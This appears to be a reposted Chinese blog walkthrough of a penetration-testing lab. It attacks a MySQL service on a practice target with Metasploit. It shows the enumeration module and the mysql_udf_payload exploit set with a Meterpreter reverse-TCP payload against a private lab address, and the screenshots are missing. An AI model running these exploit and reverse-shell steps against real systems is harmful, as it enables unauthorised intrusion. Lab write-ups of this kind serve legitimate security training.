MSTables3靶机渗透测试(2)- 攻击MySQL数据库

攻击MySQL数据库

  • MySQL进行扫描
    搜索:
msf6 > search mysql_enum

在这里插入图片描述

msf6 > use auxiliary/admin/mysql/mysql_enum

在这里插入图片描述

msf6 auxiliary(admin/mysql/mysql_enum) > run

在这里插入图片描述

  • 搜索用于攻击的模块
msf6 > search udf

在这里插入图片描述

msf6 exploit(multi/mysql/mysql_udf_payload) > set payload payload/windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf6 exploit(multi/mysql/mysql_udf_payload) > set rhosts 192.168.118.4
rhosts => 192.168.118.4

在这里插入图片描述

  • 使用模块实施攻击
    在这里插入图片描述
    在这里插入图片描述
    成功。

猜你喜欢

转载自blog.csdn.net/m0_53351713/article/details/114155271